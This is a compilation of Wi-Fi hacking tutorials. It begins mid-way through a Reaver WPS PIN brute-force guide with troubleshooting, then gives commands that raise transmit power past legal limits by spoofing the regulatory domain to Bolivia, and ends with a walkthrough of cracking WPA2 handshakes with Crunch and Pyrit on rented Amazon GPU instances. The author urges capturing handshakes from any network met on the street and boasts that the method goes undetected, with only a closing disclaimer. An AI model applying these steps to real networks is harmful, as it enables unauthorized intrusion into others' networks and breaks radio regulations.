Explanation = i  – interface used. Remember creating a monitor interface mon0 using airmon-ng start wlan0. This is what we are using. -b species the BSSID of the network that we found out earlier.
This is all the information that Reaver need to get started. However, Reaver comes with many advanced options, and some are recommended by me. Most importantly, you should use the -vv option, which increases the verbosity of the tool. Basically, it writes everything thats going on to the terminal. This helps you see whats happening, track the progress, and if needed, do some troubleshooting.  So final command should be-

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv

After some hours, you will see something like this. The pin in this case was intentionally 12345670, so it was  hacked in 3 seconds.

Here is an extra section, which might prove useful (or more like consoling, to let you know you are not the only one who is having troubles)

Known problems that are faced – Troubleshooting

  1. As in the pic above, you saw the first line read “Switching wlan0 to channel 6”. (Yours will be mon0 instead of wlan0). Sometimes, it keeps switching interfaces forever.
  2. Sometimes it never gets a beacon frame, and gets stuck in the waiting for beacon frame stage.
  3. Sometimes it never associates with the target AP.
  4. Sometimes the response is too slow, or never comes, and a (0x02) or something error is displayed.
In most cases, such errors suggest-
  1. Something wrong with wireless card.
  2. AP is very choosy, won’t let you associate.
  3. The AP does not use WPS.
  4. You are very far from the AP.
Possible workarounds-
  1. Sometimes, killing naughty processes helps. (see pictures below)
  2. Move closer to target AP
  3. Do a fakeauth using aireplay-ng and tell Reaver not to bother as we are already associated using -A (just add -A at the end of your normal reaver code)
  4. If you are using Kali Linux in Vmware, try booting into Kali using USB. I don’t know why, but sometimes internal adapters work wonders, and can’t be used from inside of a VM. In my case, booting up from USB and using internal adapter increased the signal strength and speeded up the bruteforce process. Update : It has nothing to do with internal adapter. I have verified my observation with various hackers, and it is now a known problem with Reaver. It does not work well inside Virtual machines. It is recommended that you do a live boot.
processes causing problems
Kill ’em all
All that I have written above (the troubleshooting section) is based on personal experience, and might not work. All the problems mentioned above, are well known on forums, and no 100% working solution could be found anywhere (I do my homework before posting). If you are aware of solution to any of these, do comment (anonymous comments are enabled)
tha was how to hack wpa/wpa2 wps

How to increase TX Power Signal Strength of WiFi

Increase TX Power Signal Strength of WiFi

 

This is a small guide on How to increase TX Power Signal Strength of WiFi

This guide contains 3 different methods to increase your TX Power or Signal Strength of your Wifi Wireless card. It also includes 2 ways to make those changes kick in at boot time so that you can enjoy the extra power everytime you boot into your Linux distro.

The default TX-Power of wireless is set to 20 dBm but you can increase it with a little trick to 30 dBm but let me warn you first that It might be illegal in your country, so use it at your own risk. Moreover Some models will not support these settings or wireless chip may state that it “can” transmit with higher power, but the device’s manufacturer probably did not place the appropriate heat sink in order to accomplish this. Readers MUST use this guide knowing what is allowed or not allowed in their country. Author is not responsible for any action taken by a reader.

3 simplest options for you..

Option 1

Open terminal and copy paste the following commands:

iw reg set BO
iwconfig wlan0 txpower 30

If above method gives the following error then go for Option 2.

Error for wireless request "Set Tx Power" (8B26) :
SET failed on device wlan0 ; Invalid argument.

Option 2

ifconfig wlan0 down
iw reg set BO
ifconfig wlan0 up
iwconfig wlan0 channel 13
iwconfig wlan0 txpower 30

Options 3

Copy paste the following commands into a text file and save it as IncreaseWifiTx

You might want to edit regions to your likings. Link to world regulatory domains are at the bottom of this post.

#!/bin/bash

echo "hello, root!"
echo " taking down wlan0"
ifconfig wlan0 down
sleep 3

echo "setting Region to Bolivia"
iw reg set BO
sleep 3

echo "setting TxPower to 30"
iwconfig wlan0 txpower 30
sleep 2

echo "starting wlan0"
ifconfig wlan0 up
echo "pulling wlan0 interface up"
iwconfig
sleep 5

echo "good bye"

Now do

chmod +x IncreaseWifiTx
./IncreaseWifiTx

Setting changes automatically at boot

You can achieve it in multiple ways.

By editing rc.local file

You can set it at startup by adding the above commands (choose option 1 or 2) at the end of /etc/rc.local file and with exit 0 at the end.

Some would argue to use

update-rc.d <your script> defaults

Using GUI – Start-up Programs

Move IncreaseWifiTx file to /usr/bin.

mv IncreaseWifiTx /usr/bin/IncreaseWifiTx

Make it executable

chmod +x /usr/bin/IncreaseWifiTx

Now just follow these steps:

  1. Click on “Applications” –> “System Tools” –> “Preferences” –> “Startup Applications”
  2. Click “Add”
  3. Add these details
    • Name: Increase Wifi TX
    • Command: /usr/bin/IncreaseWifiTx
    • Comment: Make my Wifi run HOT
  4. Click Save
  5. Close.

Wikipedia Link explaining Wifi
http://en.wikipedia.org/wiki/Wi-Fi
Kernel.org link explaining world regulatory domains and other info
http://git.kernel.org/cgit/linux/ker…db.txt?id=HEAD

Thanks for reading.

Using Amazon AMI for Cracking the WPA2 WiFi Hack

Let me start by sharing a little bit of programmers humour: some programmers decided to humour us and inserted the following text when something goes wrong with our Youtube request (500 Internal error) – “Sorry, something went wrong. A team of highly trained monkeys have been dispatched to deal with this situation.”

Now, you are probably asking: what does this have to do with Wi-Fi hacking? Are we hacking Youtube? NO! Is the solution to Wi-Fi hacking in Youtube? Probably! But this article is not about that. This article is about how we can efficiently hack Wi-Fi networks WPA2 protected in an efficient way.

So where do the trained monkeys and the Wi-Fi networks combine? First, Youtube is massive, a lot of code and systems on distributed infrastructures; second, it’s highly unlikely that one error spotted by a user might be spotted by any system admin or programmer; third, even if the error is relevant Youtube will not be sending anyone to check the error physically.

What I’m saying is that a global infra-structure, such as Youtube, looks at errors on a global, performance and security scale and spans resources as required, over multiple systems, to load balance performance and security. No one really looks at specific particular cases but, instead, uses their resources solve global events that impact global cloud systems.

Based on this, I’ve decided to create a new approach to handle the WPA2 hacking process. As a Security Auditor I keep pushing reports saying that Wi-Fi can, potentially, be a weak entry point and therefore needs extra caution regarding network design. But how safely are we using a Wi-Fi network with WPA2 pre-shared key?

At this point, it’s important to notice that WPA2 as it stands, wasn’t broken. Also, we are looking at a scenario where poor Wi-Fi security measures are in place. Nevertheless, I believe that this setup counts for most of the Wi-Fi deployments out there. Also, if a protocol isn’t broken doesn’t mean it isn’t hackable. That’s what I want to show you, using a new approach, where resources are potential unlimited and cost effective.

So, how can WPA2 be hacked? We can brute force the password against the Wi-Fi network (for now, let’s keep the concept global). This has been proven time consuming and resource intensive and therefore not very effective. Let me show you why. Let’s take a look at what’s available.

First, create a word list and brute force the handshake to death. Now, if you read a little bit about this attacks, most of them will tell you that the only way you might achieve such stunt would be to do some “reconnaissance” (like the company’s website) and use most of the words found to create a combination of words that might get you lucky. I don’t believe in luck – hackers do their own luck. So let’s see what happens when we try to create a word list that will open any network with and WPA2 key of 8 characters (Alphanumeric upper and lower case):

fig 1

Figure 1. Crunch Word list creation

Whoa! There’s no way this will fit on my external hard drives. Even if we get an external source to “host” this files, we’re talking about costs “NSA style” that normal mortals won’t have to spend. I guess most readers must be thinking “What the hell is this guy doing?” I agree, but stay ‘till the end. This is just a walk into the past so we can understand the future, and believe me, it’s a bright future.

So, normal word list with Crunch is out of the question. But wait, why don’t we pipe Crunch into Pyrit anyway? Would that make a difference?

A few words about the above command: we are saying to Crunch to generate all combinations of 8 characters, where we have provided the characters to use (it’s just easier if I pick all the characters I know and it will get the job done), piping the results to Pyrit that will use them (-i -) to pass through the attack to the .cap file for the Wi-Fi test network (SSID).

As you can see around 2000 PMKs per second would take us years to brute force, making it a not so viable way to hack WPA2 Wi-Fi networks. I found this link over the internet that can explain the magnitude of time it would take – http://www.lockdown.co.uk/?pg=combi. I know that you’ll probably think this is not how you do it. You probably need to go for CUDA Pyrit. And you’re right. For now I just want to show you that the normal Desktop/laptop just won’t cut it.

There is no efficient way to do it. No efficient way on how to do it. This is the part where I lay down my method. And no, we won’t be using CUDA at this stage, since we won’t be talking about the 5 Trained Monkeys yet (and they hold hands together). So, what’s the method? And why are we using Pyrit?

The reason is simple: Pyrit uses an awesome feature that allows you to attack a capture using a pre-loaded database. And why is that relevant? Because it does it by the millions per second, and because we can start the process of “our rainbow” tables. In one word, it ESCALATES. Meaning we can potentially break any length WPA2 password and I always wanted to get my hands on this solutions.

So, let’s see how my “poor” laptop does when first create the words and then import them to a database.
We are still going to stick with Crunch and Pyrit. Pyrit comes with a pre-installed database out of the box that you can use. Still, I leave it to you to connect to external databases that can escalate much better than the ones on my PC.

Based on what we did previously, we’ll going to make this in 3 steps:

Create the word list based on the same characters used before

fig 2

Figure 2. First step

Upload the word list to Pyrit DB – we are going to give a value to option -i in Pyrit

fig 3

Figure 3. Second step

Create the batch and attack

fig 4

Figure 4. Third step

As you can see, the process is quite fast after we get the batch running. Still, the batch took about the same time to run than the pipe approach, so it still doesn’t give me the flexibility and scalability I want as a hacker. I want to be able to do it in a couple of hours maximum and be able to escalate the number of characters in the combinations in a near future.

So, the next normal step is for us to arrange for computing power. In reality that’s what’s lacking right now: get the batch process to be faster (we still need to figure out the amount of data generated by Crunch as seen in the beginning of this article, but we’ll get there later). Should we be thinking of going right now to Amazon and buy the new brand PC with a powerful Nvidia card? Well we could but I’m not sure how that can be a scalable flexible solution.

On the topic of Amazon and back with the five trained monkeys… How about getting a solution that scales, and is flexible, cost effective and, like the trained monkeys, will do the work on a scale that no one can actually control? It’s time to bring out the big guns and get the Ferrari out. At least rent one.

I give you EC2 AMIs. Amazon just roll out a couple months ago some AMIs dedicated to high processing performance, based on the use of GPUs instead of CPUs (that will get the job better done), at a fractional hourly price that we can afford. I give you the G2 instances. And yes, now the trained monkeys are in control.

[raw] [/raw]

As you can see, for less than a dollar for one hour we get a machine with all the power we need. I must say, that it took me a while to get the username (ec2-user) for the AMI, stating here – Amazon it’s NOT CLEAR what’s the user name. Never the less, got it running and updated and you won’t believe how fast it was – 22Mbs bandwidth and a lot of processing power.

Regarding Amazon AMIs, I could take all article and expand on this, since there’s a lot to say. Nevertheless, it’s up to you to understand the different options available and instances that you can use. Also, remember that not all instances are available worldwide. Not that I think that region would be important on the hacking we are doing. Most of the information I found online points for the use of Amazon own AMIs. Again, it’s up to you.

fig 5

Figure 5. Amazon Lnux AMI with NIVIDA GRID GPU Driver

The AMI we are using comes empty and, therefore, we need to put all that tools we require in.
For a job well done, we’ll require Python 2.5, CUDA Pyrit and Crunch. Only then we’ll be able to put this baby to the test. For now, I’ll assume that you, the reader, have the knowledge to do the above or, at least, have a Master in Google search, where you can find all the information you require doing it.

This article is not about getting Crunch and Pyrit and, therefore, I won’t go deep into it. Let’s just say that some users out there did us the favour of compiling some interesting scripts that will allow us to get Pyrit (and some other bonus tools) up in running in seconds. That’s the power of the AMI: huge bandwidth and computer power.

For performance’s sake, I’ve decided to run Pyrit benchmark test and the results are just awesome.
Things are looking good. We should now see how much faster we can crack our test network. First I’ll pipe Crunch to Pyrit and then I’ll use the built-in database to attack the .cap file.

fig 6

Figure 6. Attacking the .cap file

We finally got where we need to reset our mind. I’m telling you this because you, reader/hacker, by now, saw that all the methods used won’t actually solve our problem. We still can hack into, potentially, any WPA2 passphrase length. It still takes too much time and, therefore, it doesn’t escalate. Untill now, and you’ll find some documentation online about this, all theories point to the use of Crunch to create a huge word list and Pyrit, using distribution loads to other AMIs. Now I didn’t talk about this because I still believe that won’t make it anyway.

About that reset and the 5 monkeys, let’s see what the Cloud can provide us (and by cloud I here launch
the next Quest – on what other clouds did you were able to run the same project? Send me your feedback for I am anxious to know). It gives us the flexibility by allowing us to use worldwide multiple AMIs or VMS;
It allows us to just pay by the hour usage, so we can actually turn off and leave it off ‘till we need to use it; It allows us to create a machine, leave it off with no charge associated and create new VMS from it.

The last paragraph it’s of the upmost importance. Let’s try to do a mental game and see how we can use all the tools described ‘till now and combine them with the advantages mentioned above. Did you get there? Need 5 more minutes? Let me help you structure your mind and define a new strategy for WPA2 cracking.

What if we could break the Crunch/Pyrit process in small bits and still use the DB feature that allows us to attack much faster? That would mean creating multiple VMS pre-loaded with Pyrit and a small part of the word list/database loaded onto it. That means that by running multiple VMS we’ll be able to crack the WPA2 in a short period, since each VM is just processing part of the load. By the end, all the VMS have processed all the possible combinations. Also, this method will allow us to escalate as far as we can go. We just need to add a new VM or VMS that will ease the load on the other machines. And for the hourly cost, believe me, we can grow and grow. Besides that, we can use the power of templates, so we don’t have to start from scratch every time we need to crack a Wi-Fi Network. The batch still needs to run, since the SSID will change, but the password list that each VM has loads and all the work required can be done prior to any hacking.

The storage problem is also gone. Load and space we can escalate, giving us the cost flexibility we need.
We just need to do our homework prior to loading the .cap file, set the SSID and run the batch. The password list will be already pre-loaded on the template from where we create the VM.

Technically speaking, let’s walk step by step so you can see the wonders of what we are doing. This time, and because I’ve already mention it, I’ve decided to go with a different AMI so you can see the different options available. Also be careful about the example you choose, as many options have different prices and performances. I went with an AMI from Amazon GPU prepared and the g2x2large example – more expensive but definitely worth it.

fig 7

Figure 7. GPU instances

Step one

get the right tools for the job. Again, I won’t waste time here since I believe that the hackers that kept reading until now understand the power of Google and will be able to do this in a heartbeat. Remember that this won’t be your production machine but, instead, a template we are creating so we don’t have to do part of the process every time we want to hack a Wi-Fi network. Also, it will allow us to construct our 5 Monkeys model, where resources are spanned and not physical.

Step two

Create a small fraction of the word list. Now, this is where it got trick. Never the less and after going through Crunch manual we figure out a way to break the word list in small pieces. It actually breaks it to a maximum file size and gives it a name, allowing us to re pick where it stopped and create from there on. If you notice the -c option you’ll see I’ve chosen a huge value so Pyrit could actually tell me which maximum value I should use.

fig 8

Figure 8. Pyrit warning

In this example we’ll be creating all combinations, upper and lower cases, with all the numbers 1 to 8 characters. As you can see Crunch will be responsible for creating the file names. We’ll then change the command to re-pick where Crunch left off and start creating a new set of files. He just needs to keep an eye for the number and size of files created and stop before we run out of space. Then, we just launch a new VM when we want to continue and start from where we left off. We’ll just going to overlap the last file created.

fig 9

Figure 9. Crunch

Pay attention to the last sequence in file name: xxxxx-yyyyy.txt. You’ll need to correct the minimum number of characters on the crunch command to match the number of yyyyy.

Step three

Upload all the files to Pyrit database. Another way you have to do it, would be to generate the word files on your local computer and upload them to the VM. You have the bandwidth so why use the storage for more than a database. This way you won’t take space with useless files. You’ll upload to one VM and place it directly on Pyrit and do a manual distribution to other VMS. You can schedule the time and leave it running during the night, since you’ll probably have more cheap storage attached on your computer.

Step four

Save the VM as a template. This step is pretty easy and straightforward. You just go to your EC2 management console, choose the instance you want (in this case all the instances created are pre-loaded with the word lists) give it a name (my advice would be to choose something like nameoffirstfile-nameoflastfile so you know what this VM is supposed to process) and choose “create image.”

Step five

Launch all the instances, insert the ESSID in Pyrit and run the batch.

Step six

Upload the cap file and attack it with Pyrit DB. I just want to add a note off-topic in this step (I’m using an Android application on my phone called Linux Deploy that allow us to install Kali Linux ARM version pretty easy). You can then, when walking down the street, get a perfect cap file for the handshake of any Wi-Fi network that you encounter, scp the file to Amazon cloud and let the Monkeys do the work for you. After all they are trained.

You’ll notice that all the steps might take some time, like the word creation, VM creation and upload to Pyrit database but in fact you just doing it once, saving it as a template and creating new VMS from the ones previously created. It will take you some time, but you’re doing a kind of Rainbow tables for Wi-Fi so expect some work prior to attack and cracking.

As you can see, all the tools and servers mention are not new to us, Hackers. It’s a matter of using some of the available tools and redefine the strategy we will use to attack whatever we can attack, make it more efficient and faster. My challenge here was to see how the mental process can be built and hope that the readers might think about other attacks or hacks that although being new, with a different strategy, might get you in where it wasn’t possible before.

New tools, new clouds and processing power will keep emerging and we hackers have to start thinking how we can leverage a good technology and give it the power it needs to achieve what we want. Also, this strategy defined here will probably go undetected. The capture and the cracking occur in different moments, and the cracking itself won’t raise any flags anywhere. Not even on Amazon.

I just hope that if you Security Guys from Amazon are reading this, that you understand that we won’t be using this for bad things. Keep in mind that we should only use this technique for Authorized testing or educational purposes. Always get permission or use your own network, before you start cracking.